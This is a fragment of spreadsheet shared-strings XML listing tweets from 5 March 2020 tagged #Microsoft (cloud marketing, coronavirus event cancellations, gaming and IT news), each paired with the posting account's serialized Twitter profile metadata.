  <si>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17:22:27 +0000 2020</t>
  </si>
  <si>
    <t>App Protection Policy data protection framework https://t.co/ZVlxVghUDt #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 17:19:11 +0000 2020</t>
  </si>
  <si>
    <t>Events: FOSDEM in Retrospect and Events Called Off
 https://t.co/9IhOwy1qc3 #fosdem #wsl #microsoft #coronavirus</t>
  </si>
  <si>
    <t>Thu Mar 05 17:18:24 +0000 2020</t>
  </si>
  <si>
    <t>Sony to Release a PS5 Pro Along The PS5  Rumor https://t.co/2Y7sErykyZ #Leak #Microsoft #PlayStation</t>
  </si>
  <si>
    <t>{'id': 3972282072, 'id_str': '3972282072', 'name': 'Gaming Instincts', 'screen_name': 'GI_Tweets', 'location': 'United States', 'description': '#1 For Hottest Video Game News, Features, Guides, Top 10s and Reviews.\n\nhttps://t.co/7YruFGUNnH\n\npress@gaminginstincts.com', 'url': 'https://t.co/IirNnF980Q', 'entities': {'url': {'urls': [{'url': 'https://t.co/IirNnF980Q', 'expanded_url': 'http://gaminginstincts.com', 'display_url': 'gaminginstincts.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/7YruFGUNnH', 'expanded_url': 'http://YouTube.com/gaminginstinctstv', 'display_url': 'YouTube.com/gaminginstinctâ€¦', 'indices': [72, 95]}]}}, 'protected': False, 'followers_count': 654, 'friends_count': 79, 'listed_count': 11, 'created_at': 'Wed Oct 21 19:42:22 +0000 2015', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11506,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'http://pbs.twimg.com/profile_images/812147014209306624/bdjKtD1I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/812147014209306624/bdjKtD1I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3972282072/1556300751',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</si>
  <si>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17:18:20 +0000 2020</t>
  </si>
  <si>
    <t>#Google, #Facebook, #Microsoft  #Amazon #IBM  measures in response to spread of #coronavirus, such as canceling conferences, encouraging employees to work remotely, and conducting interviews virtually wonder if #Academia following suit ? #COVID19 https://t.co/21yxzsCGST</t>
  </si>
  <si>
    <t>{'id': 19895837, 'id_str': '19895837', 'name': 'Julia Hengstler', 'screen_name': 'jhengstler', 'location': '', 'description': '#EdTech, #Privacy, Research, Raising DigiSavvy Kids--All opinions my own; Consultant, Faculty of Ed Professor, PhD Student, Ed Technologist.', 'url': 'https://t.co/3O804q1ABa', 'entities': {'url': {'urls': [{'url': 'https://t.co/3O804q1ABa', 'expanded_url': 'http://jhengstler.wordpress.com', 'display_url': 'jhengstler.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3745, 'friends_count': 3231, 'listed_count': 357, 'created_at': 'Mon Feb 02 06:17:59 +0000 2009', 'favourites_count': 12075, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 60652, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B4B4B4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1068329878850686976/UH5WzvpQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068329878850686976/UH5WzvpQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19895837/1523990820', 'profile_link_color': '3787C4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:18:19 +0000 2020</t>
  </si>
  <si>
    <t>We decided to bring Tiki to Helsinki for our own mini Maverick #ISE2020! Thank you to our vendors @mseurope, @sharp_europe, @LogitechVC, @BarcoClickShare, @LenovoBusiness and @Webex for all your contributions!#AVTweeps#Microsoft #surfsup https://t.co/2yd4000IIs</t>
  </si>
  <si>
    <t>{'id': 158298325, 'id_str': '158298325', 'name': 'Maverick AV Solution', 'screen_name': 'MaverickAVWorld', 'location': 'Europe', 'description': 'Specialist AV Distribution Experts, part of @TechData. #collaboration #AVtweeps', 'url': 'https://t.co/1OWObG0Cta', 'entities': {'url': {'urls': [{'url': 'https://t.co/1OWObG0Cta', 'expanded_url': 'http://www.tdmaverick.co.uk', 'display_url': 'tdmaverick.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2639, 'friends_count': 2300, 'listed_count': 72, 'created_at': 'Tue Jun 22 08:55:44 +0000 2010', 'favourites_count': 1196, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4908, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D2D7D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/913015645079588864/dxPP56j8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913015645079588864/dxPP56j8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/158298325/1506514890', 'profile_link_color': '295094', 'profile_sidebar_border_color': 'DCDFE0', 'profile_sidebar_fill_color': 'E3E3E3', 'profile_text_color': '3359B8', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:15:51 +0000 2020</t>
  </si>
  <si>
    <t>Optimus was a guest panelist at the Tech Talk Event in Jamaica on February 25th. Special thanks to Ingenuity Technologies &amp;amp; Intcomex for the invitation.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT https://t.co/vax7HTPEeg</t>
  </si>
  <si>
    <t>Thu Mar 05 17:14:32 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are giving away enterprise conferencing tools due to #coronavirus #Covid_19fr #coronvirus #TransfoNum https://t.co/Jkie50AtMB via @Verge</t>
  </si>
  <si>
    <t>{'id': 2831507036, 'id_str': '2831507036', 'name': 'CÃ©line Dupont', 'screen_name': 'CelineDupont9', 'location': 'Poissy, France', 'description': '#conduiteduchangement #TransfoNum consultant @julhietsterwen |  I love this game ðŸ€ | I care about the Earth ðŸŒ and people ðŸ‘¨\u200dðŸ‘©\u200dðŸ‘§\u200dðŸ‘¦', 'url': 'https://t.co/nMzaWAmZcX', 'entities': {'url': {'urls': [{'url': 'https://t.co/nMzaWAmZcX', 'expanded_url': 'http://fr.linkedin.com/in/celinedupont9', 'display_url': 'fr.linkedin.com/in/celineduponâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1126, 'friends_count': 1527, 'listed_count': 126, 'created_at': 'Thu Sep 25 09:33:41 +0000 2014', 'favourites_count': 6296, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4498,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'http://pbs.twimg.com/profile_images/848850470022021121/gVciIIR-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/848850470022021121/gVciIIR-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2831507036/1566296932', 'profile_link_color': '89C9FA',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</si>
  <si>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17:10:45 +0000 2020</t>
  </si>
  <si>
    <t>Azure Services by Datalink Networks delivers contracted ongoing support to help you assess and plan your move to the cloud.
Learn more: https://t.co/Kf6JR4SlBE
#azure #azureactivedirectory #microsoft #microsoftazure #datalinknetworks https://t.co/bz9SZcbUai</t>
  </si>
  <si>
    <t>{'id': 205806589, 'id_str': '205806589', 'name': 'Datalink Networks', 'screen_name': 'datalink_net', 'location': 'Santa Clarita, CA', 'description': 'Datalink Networks is a premier IT Managed Service Provider, consulting, design and professional service company serving Southern California for over 30 years.', 'url': 'https://t.co/vToQ5HRmJF', 'entities': {'url': {'urls': [{'url': 'https://t.co/vToQ5HRmJF', 'expanded_url': 'http://www.datalinknetworks.net', 'display_url': 'datalinknetworks.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 607, 'friends_count': 610, 'listed_count': 18, 'created_at': 'Thu Oct 21 16:59:18 +0000 2010', 'favourites_count': 64, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1635,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'http://pbs.twimg.com/profile_images/3292247693/edca7a49448bcd6c2e6777f97f95d189_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3292247693/edca7a49448bcd6c2e6777f97f95d189_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/205806589/1561672986',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</si>
  <si>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Thu Mar 05 17:08:37 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a new console then come down to the store and get your hand on this preowned 1TB Xbox one #ForzaMotorsport console for just 149.99. Or if you have any unwanted games or consoles then why not trade them in and get a cheaper spend.
#TradeInAtGame #Microsoft https://t.co/X2M7LhJ1eK</t>
  </si>
  <si>
    <t>{'id': 585535255, 'id_str': '585535255', 'name': 'GAME Romford', 'screen_name': 'GAMERomford', 'location': 'Ground Floor of The Mercury', 'description': 'A direct feed from the guys at GAME in The Mercury Shopping Centre Romford. Follow for news on deals, new releases &amp; much more!', 'url': 'https://t.co/9dseonUxBj', 'entities': {'url': {'urls': [{'url': 'https://t.co/9dseonUxBj', 'expanded_url': 'http://www.game.co.uk', 'display_url': 'game.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1668, 'friends_count': 968, 'listed_count': 33, 'created_at': 'Sun May 20 09:51:23 +0000 2012', 'favourites_count': 381, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7902,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'http://pbs.twimg.com/profile_images/836311454798196736/eS4uNaie_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/836311454798196736/eS4uNaie_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/585535255/1498039618', 'profile_link_color': '050505',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</si>
  <si>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17:08:24 +0000 2020</t>
  </si>
  <si>
    <t>Experience the Power of PowerShell 7!
#microsoft #powershell https://t.co/CZ3TvUQSwF</t>
  </si>
  <si>
    <t>{'id': 61251606, 'id_str': '61251606', 'name': 'Andrea Fisher', 'screen_name': 'andreatfisher', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 42, 'listed_count': 4, 'created_at': 'Wed Jul 29 17:45:05 +0000 2009', 'favourites_count': 1067, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 361,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'http://pbs.twimg.com/profile_images/378800000774206791/7ab7c4a7d53c3b738a332596f6f1ae73_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000774206791/7ab7c4a7d53c3b738a332596f6f1ae73_normal.png',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</si>
  <si>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17:03:44 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Attackers Deliver Malware via Fake Website Certificate Errors:" https://t.co/7cd8VkQfCu
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Mar 05 17:03:38 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #msdyn365 #cloud      How much profit would you see from a 10% decrease in COGs? See what a modern business application like @Dynamics365 can do for you in Finance and Operations. #innovation https://t.co/e7IpYe89lL</t>
  </si>
  <si>
    <t>Thu Mar 05 17:02:51 +0000 2020</t>
  </si>
  <si>
    <t>Installing/Configuring Microsoft Sharepoint 2016 https://t.co/l7eYpuoj8d via @YouTube #Microsoft #Sharepoint #SystemAdmin #Tech #Technology</t>
  </si>
  <si>
    <t>Thu Mar 05 17:02:37 +0000 2020</t>
  </si>
  <si>
    <t>High intensity interval training comes with a myriad of benefits for your body and brain 
https://t.co/lO3S1fz0s5
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65</t>
  </si>
  <si>
    <t>Thu Mar 05 17:01:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Forms is arguably one of the most underrated #Office365 services out there, however its an excellent tool for getting users into the Microsoft cloud universe! Here's Part 1 of how to get started in #MicrosoftForms https://t.co/YPNaXs7nk9</t>
  </si>
  <si>
    <t>{'id': 100302914, 'id_str': '100302914', 'name': 'AvePointPublicSector', 'screen_name': 'AvePointGov', 'location': 'Washington, D.C.', 'description': 'AvePoint - The leading provider of SharePoint infrastructure management solutions for the U.S. government.', 'url': 'http://t.co/qZxAHtE9I4', 'entities': {'url': {'urls': [{'url': 'http://t.co/qZxAHtE9I4', 'expanded_url': 'http://avepointpublicsector.com/', 'display_url': 'avepointpublicsector.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 618, 'friends_count': 421, 'listed_count': 61, 'created_at': 'Tue Dec 29 19:38:10 +0000 2009', 'favourites_count': 171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3112,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'http://pbs.twimg.com/profile_images/1125413978463719424/vYiShBwR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125413978463719424/vYiShBwR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/100302914/1576087104',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</si>
  <si>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17:01:24 +0000 2020</t>
  </si>
  <si>
    <t>Register to learn what #Microsoft has done to blend Task &amp;amp; Work Management with Project, Program and Portfolio Management tech improvements across #Office365. https://t.co/zCnzdHZ0vD</t>
  </si>
  <si>
    <t>{'id': 56420310, 'id_str': '56420310', 'name': 'Advisicon', 'screen_name': 'Advisicon', 'location': 'North America', 'description': 'Advisicon specializes in helping organizations integrate their culture with project &amp; portfolio management best practices &amp; technologies.', 'url': 'http://t.co/Q58WlYAD4T', 'entities': {'url': {'urls': [{'url': 'http://t.co/Q58WlYAD4T', 'expanded_url': 'http://www.advisicon.com', 'display_url': 'advisicon.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 812, 'friends_count': 782, 'listed_count': 108, 'created_at': 'Mon Jul 13 16:37:42 +0000 2009', 'favourites_count': 603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4514,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'http://pbs.twimg.com/profile_images/712783131317641216/ZgeQutQK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/712783131317641216/ZgeQutQK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56420310/1522256945', 'profile_link_color': '167C88',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</si>
  <si>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17:01:16 +0000 2020</t>
  </si>
  <si>
    <t>How to migrate Windows Server 2008 to Azure? 
See: https://t.co/ESsX4lizyR
#WindowsServer #WindowsServer2008 #Azure #AzureStack #AzureMigrate #Microsoft #Apps4Rent https://t.co/kPbGeRbcd8</t>
  </si>
  <si>
    <t>{'id': 19523445, 'id_str': '19523445', 'name': 'Apps4Rent', 'screen_name': 'Apps4Rent', 'location': 'Maplewood, NJ', 'description': 'Premium application hosting company in New Jersey | Serving over 10,000 customers since 2003 | Enjoy premium cloud solutions at best prices with 24/7 support.', 'url': 'http://t.co/MGhEhZ4avw', 'entities': {'url': {'urls': [{'url': 'http://t.co/MGhEhZ4avw', 'expanded_url': 'http://www.apps4rent.com/', 'display_url': 'apps4rent.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 279, 'friends_count': 394, 'listed_count': 12, 'created_at': 'Mon Jan 26 06:55:06 +0000 2009', 'favourites_count': 79, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/413760683272986624/8pSXz0Hx_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/413760683272986624/8pSXz0Hx_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19523445/1568322793',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</si>
  <si>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17:00:56 +0000 2020</t>
  </si>
  <si>
    <t>What #Microsofts $1 Billion Investment in Open #AI Could Achieve? https://t.co/EiSkKKJ2KL via @techsocialnet</t>
  </si>
  <si>
    <t>{'id': 87322712, 'id_str': '87322712', 'name': 'Maddy', 'screen_name': 'mrugesh29', 'location': 'India', 'description': '"Strengthening morals of life through challenges" \nInterests: IT, Digital Transformation, Technology Enthusiast, Sales &amp; Success!!', 'url': 'https://t.co/wt4bacfBgH', 'entities': {'url': {'urls': [{'url': 'https://t.co/wt4bacfBgH', 'expanded_url': 'https://www.linkedin.com/in/mrugesh-mistry-b976a643', 'display_url': 'linkedin.com/in/mrugesh-misâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 953, 'friends_count': 1301, 'listed_count': 101, 'created_at': 'Wed Nov 04 00:25:45 +0000 2009', 'favourites_count': 575, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2170,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'http://pbs.twimg.com/profile_images/1232237200932126720/bW2s2Kqs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232237200932126720/bW2s2Kqs_normal.jpg',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</si>
  <si>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17:00:55 +0000 2020</t>
  </si>
  <si>
    <t>@abalonfr is on stage at #SecureITDay 2020! #Microsoft #Security #Cloud #MonacoDigital @MonacoDigital98 @patricg https://t.co/CzamJ3EUkb</t>
  </si>
  <si>
    <t>Thu Mar 05 17:00:38 +0000 2020</t>
  </si>
  <si>
    <t>Gathering for @MayorBowsers pressconf on bringing 1600 #Microsoft computers to @dcpublicschools @DCPSChancellor &amp;amp; @LindseyVParker, @OCTODC head, at Van Ness ES. https://t.co/zNvOcTeFlo</t>
  </si>
  <si>
    <t>{'id': 176808269, 'id_str': '176808269', 'name': 'bill rice', 'screen_name': 'ricebilldc', 'location': 'Washington, DC', 'description': 'Advocate, writer/columnist &amp; collector of DC history. Need full Washingtoniana access while MLK shut. Mozartâ€™s the pooch in pix w me. 202-437-7787', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1462, 'friends_count': 458, 'listed_count': 43, 'created_at': 'Tue Aug 10 14:02:22 +0000 2010', 'favourites_count': 1262, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5698,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'http://pbs.twimg.com/profile_images/683644435612184576/TJn0qBKG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/683644435612184576/TJn0qBKG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/176808269/1468292629',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</si>
  <si>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17:00:19 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/ttqOzhx0Bj</t>
  </si>
  <si>
    <t>Thu Mar 05 17:00:08 +0000 2020</t>
  </si>
  <si>
    <t>WE are profoundly honored to be named one of the top #AI influencers in the world in 2020  #Microsoft #AI #technology https://t.co/PiYurtqfuC</t>
  </si>
  <si>
    <t>{'id': 170859189, 'id_str': '170859189', 'name': 'GameChanger', 'screen_name': 'noclutter', 'location': 'everywhere', 'description': 'Why are you trying to fit in, ..when you were BORN to .... STAND-OUT?', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2241, 'friends_count': 1533, 'listed_count': 45, 'created_at': 'Sun Jul 25 23:37:56 +0000 2010', 'favourites_count': 176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3174, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '01090D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1846203662/Born_to_Stand_Out_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1846203662/Born_to_Stand_Out_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/170859189/1430045923', 'profile_link_color': 'B30089', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': '14181A', 'profile_text_color': '47B4CF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:00:02 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud.   #transformation #Azure #Microsoft https://t.co/uFERvuI803</t>
  </si>
  <si>
    <t>Thu Mar 05 16:59:24 +0000 2020</t>
  </si>
  <si>
    <t>So what have I learnt and been involved in during my first month at #Microsoft #Azure? And what does the future hold?
New blog post coming soon ...
#HPC #AL #cloud #autonomous #MicrosoftLife</t>
  </si>
  <si>
    <t>{'id': 111317745, 'id_str': '111317745', 'name': 'Andrew Jones', 'screen_name': 'hpcnotes', 'location': '', 'description': 'Planning the future #Azure #HPC &amp; #AI offerings, after 20+ years of High Performance Computing business/technology evaluation #supercomputing #cloud #F1 #travel', 'url': 'https://t.co/O0bKdUVPxQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/O0bKdUVPxQ', 'expanded_url': 'http://www.hpcnotes.com', 'display_url': 'hpcnotes.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6385, 'friends_count': 974, 'listed_count': 240, 'created_at': 'Thu Feb 04 14:17:35 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10409, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '707070', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1060570570675367936/7Lhm5ekv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060570570675367936/7Lhm5ekv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/111317745/1578941265', 'profile_link_color': '96C334', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'E8E8E8', 'profile_text_color': '333399', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:59:04 +0000 2020</t>
  </si>
  <si>
    <t>Computer subscription scam - 818-306-3161 - #Scammer #Scambait #TSU #Refund #Scam #Info #Information #Windows #Microsoft - https://t.co/2y7xSbWQJt</t>
  </si>
  <si>
    <t>{'id': 1038635068497907712, 'id_str': '1038635068497907712', 'name': 'TSU', 'screen_name': 'TSUSiteOfficial', 'location': 'USA', 'description': 'ScamBait forum! - Discuss &amp; Share #scammer #numbers, Websites, #Tech &amp; more! link for our #scambait forum below!  â†“  â†“  â†“', 'url': 'https://t.co/qla2eKmM7c', 'entities': {'url': {'urls': [{'url': 'https://t.co/qla2eKmM7c', 'expanded_url': 'https://techscammersunited.com', 'display_url': 'techscammersunited.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 705, 'friends_count': 1, 'listed_count': 3, 'created_at': 'Sun Sep 09 03:47:52 +0000 2018', 'favourites_count': 68, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 263,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'http://pbs.twimg.com/profile_images/1038635262115377152/UJZ18U2t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1038635262115377152/UJZ18U2t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1038635068497907712/1536464998',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</si>
  <si>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16:58:43 +0000 2020</t>
  </si>
  <si>
    <t>#BigTech is asking Employees to Stay Home Over Growing #Coronavirus Threat. @themotleyfool #stocks #Amazon #Facebook #Microsoft #Twitter #Square #COVID19 #SARSCoV2 $MSFT $AMZN $FB $TWTR $SQ https://t.co/VdFsk4RU1p</t>
  </si>
  <si>
    <t>{'id': 612187786, 'id_str': '612187786', 'name': 'Danny Vena', 'screen_name': 'dannyvena', 'location': 'San Diego ', 'description': "Ardent follower of Jesus of Nazareth. Husband and father. Faith doesn't make people better, merely forgiven. My posts reflect my life and my experience.", 'url': 'https://t.co/XqZPMN55ET', 'entities': {'url': {'urls': [{'url': 'https://t.co/XqZPMN55ET', 'expanded_url': 'http://www.fool.com/author/7018/index.aspx', 'display_url': 'fool.com/author/7018/inâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1597, 'friends_count': 233, 'listed_count': 63, 'created_at': 'Tue Jun 19 02:01:40 +0000 2012', 'favourites_count': 694, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3877,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'http://pbs.twimg.com/profile_images/2565820855/cfschrdepgwiasspgmlp_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2565820855/cfschrdepgwiasspgmlp_normal.jpeg',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</si>
  <si>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16:57:28 +0000 2020</t>
  </si>
  <si>
    <t>Learn Microsoft Excel online for beginners
#Excel #rapidhacek #microsoft #office #cheatsheet #online #tutorials
Source from:
https://t.co/NsJ5UhCVni https://t.co/VtdkeX5sCa</t>
  </si>
  <si>
    <t>{'id': 2184289051, 'id_str': '2184289051', 'name': 'Himanshu Chaudhary', 'screen_name': 'vampireinfinite', 'location': 'Chandigarh, India', 'description': 'ðŸ”°Himanshu is a ðŸ›¡#socialmedia expert &amp; CEO in â˜£@rapidhacek. Iâ€™m the âš”#illegitimate and love #child #creativity. â—¾#problemsolver â„¢#ethicalhacker #entrepreneur âœ', 'url': 'https://t.co/yNl2qmvPlG', 'entities': {'url': {'urls': [{'url': 'https://t.co/yNl2qmvPlG', 'expanded_url': 'http://www.rapidhacek.com', 'display_url': 'rapidhacek.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 103, 'friends_count': 1066, 'listed_count': 0, 'created_at': 'Sat Nov 09 13:01:56 +0000 2013', 'favourites_count': 3020, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5928, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219310509175930881/gMxUWQQJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219310509175930881/gMxUWQQJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2184289051/1579541256', 'profile_link_color': 'FAB81E',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</si>
  <si>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16:55:04 +0000 2020</t>
  </si>
  <si>
    <t>Get quick culture wins for digital transformation readiness: https://t.co/2vEOkHtQYL
#DigitalTransformation #Microsoft #Azure #ModernWorkplace #Transformation</t>
  </si>
  <si>
    <t>Thu Mar 05 16:54:03 +0000 2020</t>
  </si>
  <si>
    <t>#Linux and #OpenSource are in business by #Microsoft https://t.co/e7N4en6QgZ #Laser</t>
  </si>
  <si>
    <t>Thu Mar 05 16:51:51 +0000 2020</t>
  </si>
  <si>
    <t>Half the worlds population lives within 200 kilometers of the ocean. 
Microsoft is going deep with this experimental #datacenter: https://t.co/JkKqGR6rR6 #supportnerds #microsoft #datacenter #IT #tech #technology https://t.co/tBSbzWdxrz</t>
  </si>
  <si>
    <t>{'id': 3940076794, 'id_str': '3940076794', 'name': 'SupportNerds, Inc. ðŸ› ðŸ–¥', 'screen_name': 'supportnerdsinc', 'location': 'Pennsylvania, USA', 'description': 'Support Nerds Inc. offers Technical Support &amp; Managed #ITServices in US &amp; Canada. Connect with us to get your technical queries answered.', 'url': 'https://t.co/MQoQnalvCt', 'entities': {'url': {'urls': [{'url': 'https://t.co/MQoQnalvCt', 'expanded_url': 'http://www.supportnerds.us/', 'display_url': 'supportnerds.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 367, 'friends_count': 183, 'listed_count': 12, 'created_at': 'Mon Oct 12 20:01:57 +0000 2015', 'favourites_count': 94, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 497,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'http://pbs.twimg.com/profile_images/1081285012274757633/kmE2pVR__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081285012274757633/kmE2pVR__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3940076794/1563402177',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</si>
  <si>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16:51:37 +0000 2020</t>
  </si>
  <si>
    <t>Day 64/366. 2003/10/21.
